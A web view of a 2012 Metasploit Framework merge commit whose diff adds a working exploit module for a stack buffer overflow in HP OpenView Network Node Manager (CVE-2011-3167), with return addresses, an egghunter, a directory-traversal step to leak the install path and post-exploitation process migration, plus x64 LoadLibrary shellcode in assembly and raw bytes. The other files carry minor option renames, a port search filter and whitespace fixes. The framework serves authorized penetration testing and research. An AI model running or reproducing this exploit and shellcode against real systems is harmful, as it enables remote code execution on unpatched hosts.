dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'master' of r7.github.com:rapid7/metasploit-framework

This commit is contained in:
Jonathan Cran 2012-01-19 09:23:56 -06:00
parent 984850b157 bb035bfec2
commit 3fe5b7b09d
14 changed files with 399 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm vendored Normal file
View File

@ -0,0 +1,24 @@
;-----------------------------------------------------------------------------;
; Author: scriptjunkie (scriptjunkie[at]scriptjunkie[dot]us),
; Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2003
; 17 Jan 2012
;-----------------------------------------------------------------------------;
[BITS 64]
[ORG 0]
cld ; Clear the direction flag.
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ;
%include "./src/block/block_api.asm" ;
start: ;
pop rbp ; Pop off the address of 'api_call' for calling later.
lea rcx, [ebp+libpath-delta]
mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call rbp ; LoadLibraryA( &libpath );
; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"
libpath:
;db "funkystuff.dll", 0

2
lib/msf/core/module.rb
View File

@ -690,6 +690,8 @@ class Module
if not match and self.respond_to?(:targets) and self.targets
match = [t,w] if self.targets.map{|x| x.name}.any? { |t| t =~ r }
end
when 'port'
match = [t,w] if self.datastore['RPORT'].to_s =~ r
when 'type'
match = [t,w] if (w == "exploit" and is_exploit)
match = [t,w] if (w == "auxiliary" and is_auxiliary)

1
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -1285,6 +1285,7 @@ class Core
"name" => "Modules with a matching descriptive name",
"path" => "Modules with a matching path or reference name",
"platform" => "Modules affecting this platform",
"port" => "Modules with a matching remote port",
"type" => "Modules of a specific type (exploit, auxiliary, or post)",
"app" => "Modules that are client or server attacks",
"author" => "Modules written by this author",

4
modules/auxiliary/gather/corpwatch_lookup_name.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
OptString.new('YEAR', [ false, "Limit results to a specific year", ""]),
OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
OptString.new('API_KEY', [ false, "Use this API key when getting the data", ""]),
OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
], self.class)
deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST')
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['API_KEY']
'key' => datastore['CORPWATCH_APIKEY']
}
}, 25)

4
modules/auxiliary/gather/shodan_search.rb
View File

@ -45,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary
register_options(
[
OptString.new('APIKEY', [true, "The SHODAN API key"]),
OptString.new('SHODAN_APIKEY', [true, "The SHODAN API key"]),
OptString.new('QUERY', [true, "Keywords you want to search for"]),
OptString.new('OUTFILE', [false, "A filename to store the list of IPs"]),
OptBool.new('DATABASE', [false, "Add search results to the database", false]),
@ -89,7 +89,7 @@ class Metasploit4 < Msf::Auxiliary
def run
# create our Shodan request parameters
query = datastore['QUERY']
apikey = datastore['APIKEY']
apikey = datastore['SHODAN_APIKEY']
@res = Net::DNS::Resolver.new()
dns_query = @res.query("#{datastore['VHOST']}", "A")

4
modules/auxiliary/scanner/http/httpbl_lookup.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
# OptAddressRange.new('RHOSTS', [false, "The target address, range, or CIDR identifier"]),
OptString.new('APIKEY', [ true, "Your HTTP:BL api key"])
OptString.new('HTTPBL_APIKEY', [ true, "Your HTTP:BL api key"])
], self.class)
end
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
def resolve(ip)
results = ''
apikey = datastore['apikey']
apikey = datastore['HTTPBL_APIKEY']
query = apikey + '.' + ip.split('.').reverse.join('.') + '.dnsbl.httpbl.org'
begin
results = Resolv::DNS.new.getaddress(query).to_s

9
modules/auxiliary/scanner/mssql/mssql_schemadump.rb
View File

@ -83,17 +83,17 @@ class Metasploit3 < Msf::Auxiliary
unless tmp_tblnames.nil?
tmp_db['DBName']= dbname[0]
tmp_db['Tables'] = []
tmp_tblnames.each do |tblname|
tmp_tblnames.each do |tblname|
next if tblname[0].nil?
tmp_tbl = {}
tmp_tbl['TableName'] = tblname[0]
tmp_tbl['TableName'] = tblname[0]
tmp_tbl['Columns'] = []
tmp_columns = get_columns(dbname[0], tblname[1])
unless tmp_columns.nil?
tmp_columns.each do |column|
next if column[0].nil?
next if column[0].nil?
tmp_column = {}
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnType'] = column[1]
tmp_column['ColumnLength'] = column[2]
tmp_tbl['Columns'] << tmp_column
@ -121,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary
return results
end
# TODO: This should be split up, I fear nil problems in these query/response parsings
def get_columns(db_name, table_id)
results = mssql_query("Select syscolumns.name,systypes.name,syscolumns.length from #{db_name}..syscolumns JOIN #{db_name}..systypes ON syscolumns.xtype=systypes.xtype WHERE syscolumns.id=#{table_id}")[:rows]
return results

4
modules/auxiliary/scanner/mysql/mysql_schemadump.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'MYSQL Schema Dump',
'Version' => '$Revision$',
'Description' => %Q{
This module extracts the schema information from a
This module extracts the schema information from a
MySQL DB server.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary
unless tmp_clmnames.nil? or tmp_clmnames.empty?
tmp_clmnames.each do |column|
tmp_column = {}
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnName'] = column[0]
tmp_column['ColumnType'] = column[1]
tmp_tbl['Columns'] << tmp_column
end

3
modules/auxiliary/scanner/postgres/postgres_schemadump.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Postgres Schema Dump',
'Version' => '$Revision$',
'Description' => %Q{
This module extracts the schema information from a
This module extracts the schema information from a
Postgres server.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
@ -117,7 +117,6 @@ class Metasploit3 < Msf::Auxiliary
when :complete
return res[:complete].rows
end
end

2
modules/exploits/osx/browser/mozilla_mchannel.rb
View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Description' => %q{
This module exploits an use after free vulnerability in Mozilla
This module exploits a use-after-free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs

2
modules/exploits/windows/fileformat/adobe_reader_u3d.rb
View File

@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano', #Original poc (@feliam)
'sinn3r',
'juan vazquez',
'jduck'
@ -40,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ],
[ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ],
[ 'URL', 'https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0'], #Original PoC
[ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ]
],
'DefaultOptions' =>

277
modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb Normal file
View File

@ -0,0 +1,277 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Egghunter
def initialize(info={})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node
Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long
'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can
cause a stack-based buffer overflow and execute arbitrary code.
The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There
are no stack cookies, so exploitation is achieved by overwriting the saved return
address.
The vulnerability is due to the use of the function "_OVConcatPath" which finally
uses "strcat" in a insecure way. User controlled data is concatenated to a string
which contains the OpenView installation path.
To achieve reliable exploitation a directory traversal in OpenView5.exe
(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation
path. If the installation path cannot be guessed the default installation path
is used.
} ,
'Author' =>
[
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
'juan vazquez', # Metasploit module
'sinn3r' # Metasploit fu
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3167' ],
[ 'OSVDB', '76775' ],
[ 'BID', '50471' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]
],
'Payload' =>
{
'Space' => 950,
'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0b..0x23)].pack("C*") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack("C*"),
'DisableNops' => true,
'EncoderOptions' =>
{
'BufferRegister' => 'EDI' # Egghunter jmp edi
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',
# Patches installed:
# * ECS_00048
# * NNM_01128
# * NNM_01172
# * NNM_01187
{
'Offset' => 1067,
'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)
'JmpESP' => 0x5a4251c5, # call esp - in ov.dll
'EggAdjust' => 4,
'ReadableAddress' => 0x5a466930 # ov.dll
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 01 2011'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
# The following code allows to migrate if having into account
# that over Windows XP permissions aren't granted on %windir%\system32
#
# Code ripped from "modules/post/windows/manage/migrate.rb". See it
# for more information
def on_new_session(client)
if client.type != "meterpreter"
print_error("NOTE: you must use a meterpreter payload in order to process migration.")
return
end
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
# Select path and executable to run depending the architecture
# and the operating system
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
windir = client.fs.file.expand_path("%ProgramFiles%")
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
else # Windows 2000
windir = client.fs.file.expand_path("%windir%")
if client.sys.config.sysinfo['Architecture'] =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"
else
cmd = "#{windir}\\Sysnative\\notepad.exe"
end
end
# run hidden
print_status("Spawning #{cmd.split("\\").last} process to migrate to")
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
target_pid = proc.pid
begin
print_good("Migrating to #{target_pid}")
client.core.migrate(target_pid)
print_good("Successfully migrated to process #{target_pid}")
rescue ::Exception => e
print_error("Could not migrate in to process.")
print_error(e.to_s)
end
end
# Tries to guess the HP OpenView install dir via the Directory traversal identified
# by OSVDB 44359.
# If OSVDB 44359 doesn't allow to retrieve the installation path the default one
# (C:\Program Files\HP OpenView\) is used.
# Directory Traversal used:
# http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log
def get_install_path
cgi = '/OvCgi/OpenView5.exe'
web_session = rand_text_numeric(3)
my_cookie = "OvOSLocale=English_United States.1252; "
my_cookie << "OvAcceptLang=en-US; "
my_cookie << "OvJavaLocale=en_US.Cp1252; "
my_cookie << "OvWebSession=#{web_session}:AnyUser:"
payload = "../../../log/setup.log"
res = send_request_cgi({
'uri' => cgi,
'cookie' => my_cookie,
'method' => "GET",
'vars_get' =>
{
'Target' => "Main",
'Scope' => "Snmp",
'Action' => payload
}
}, 5)
installation_path = ""
if res and res.code == 200 and
res.body =~ /([A-Z]:\\.*\\)log/
print_status("Installation Path Found in #{$1}")
installation_path = $1
else
print_status("Installation Path Not Found using the default")
installation_path = "C:\\Program Files\\HP OpenView\\"
end
return installation_path
end
def exploit
print_status("Trying target #{target.name}...")
install_path = get_install_path
install_path << "help\\English_United States.1252"
eggoptions = {
:checksum => true,
}
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
[ 'x86/alpha_mixed'].each { |name|
enc = framework.encoders.create(name)
if name =~/alpha/
# If control is transferred to the decoder via "call esp" BufferOfset
# shoulds be adjusted.
if target["EggAdjust"] and target["EggAdjust"] > 0
enc_options = {
'BufferRegister' => 'ESP',
'BufferOffset' => target["EggAdjust"]
}
enc.datastore.import_options_from_hash(enc_options)
else
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
end
end
hunter = enc.encode(hunter, nil, nil, platform)
}
offset = target['Offset'] - install_path.length - egg.length
my_payload = egg
my_payload << rand_text_alphanumeric(offset)
my_payload << [target.ret].pack("V")
my_payload << rand_text_alphanumeric(4) # Padding
my_payload << [target["ReadableAddress"]].pack("V")
my_payload << [target["JmpESP"]].pack("V")
my_payload << hunter
buf = "-textFile+#{my_payload}+++++++++++++++++++++++"
buf << "-appendSelectList+-appendSelectListToTitle+%09%09++++++"
buf << "-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++"
buf << "-dataLine+2+"
buf << "-commandTitle+%22Services%22+%09%09++++++"
buf << "-iconName+%22Services%22+++++++++++++++++++++++"
buf << "-cmd+rnetstat+"
buf << "-S"
web_session = rand_text_numeric(3)
my_cookie = "OvOSLocale=English_United States.1252; "
my_cookie << "OvAcceptLang=en-US; "
my_cookie << "OvJavaLocale=en_US.Cp1252; "
my_cookie << "OvWebSession=#{web_session}:AnyUser:"
cgi = '/OvCgi/webappmon.exe'
res = send_request_cgi({
'uri' => cgi,
'cookie' => my_cookie,
'method' => "POST",
'vars_post' =>
{
'ins' => 'nowait',
'sel' => rand_text_alphanumeric(15),
'app' => 'IP Tables',
'act' => 'Services',
'help' => '',
'cache' => rand_text_numeric(4)
},
'data' => "arg=#{buf}" # Avoid uri encoding
}, 3)
if res and res.code != 502
print_error("Eek! We weren't expecting a response, but we got one")
if datastore['DEBUG']
print_line()
print_error(res.inspect)
end
end
handler
end
end
=begin
* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3
meterpreter > run post/windows/manage/migrate
[*] Running module against HOME-F006222D6C
[*] Current server process: webappmon.exe (7064)
[*] Spawning notepad.exe process to migrate to
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
[-] Call stack:
[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
[-] (eval):80:in `create_temp_proc'
[-] (eval):49:in `run'
=end

74
modules/payloads/singles/windows/x64/loadlibrary.rb Normal file
View File

@ -0,0 +1,74 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows x64 LoadLibrary Path',
'Version' => '$Revision$',
'Description' => 'Load an arbitrary x64 library path',
'Author' => [ 'scriptjunkie', 'sf' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'PayloadCompat' =>
{
'Convention' => '-http -https',
},
'Payload' =>
{
'Offsets' =>
{
'EXITFUNC' => [ 228, 'V' ]
},
'Payload' =>
"\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" +
"\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" +
"\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" +
"\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" +
"\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" +
"\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" +
"\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" +
"\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" +
"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" +
"\xFF\xFF\x5D\x67\x48\x8D\x8D\x00\x01\x00\x00\x41\xBA\x4C\x77\x26" +
"\x07\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5" +
"\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13" +
"\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
}
))
register_options(
[
OptString.new('DLL', [ true, "The library path to load (UNC is OK)" ]),
], self.class )
end
def generate
return super + dll_string + "\x00"
end
def dll_string
return datastore['DLL'] || ''
end
end

8
modules/post/windows/gather/enum_artifacts.rb
View File

@ -15,12 +15,12 @@ class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::File
include Msf::Post::Windows::Registry
def initialize(info={})
super( update_info( info,
'Name' => 'Windows File and Registry Artifacts Enumeration',
'Description' => %q{
This module will check the file system and registry for particular artifacts. The
This module will check the file system and registry for particular artifacts. The
list of artifacts is read from data/post/artifacts or a user specified file. Any
matches are written to the loot. },
'License' => MSF_LICENSE,
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post
# Start enumerating
print_status("Processing artifacts file...")
file = ::File.open(filename, "r")
file = ::File.open(filename, "rb")
file.each_line do |line|
line.strip!
next if line.length < 1
@ -103,4 +103,4 @@ end
=begin
To-do: Use CSV or yaml format to store enum_artifacts_list.txt
=end
=end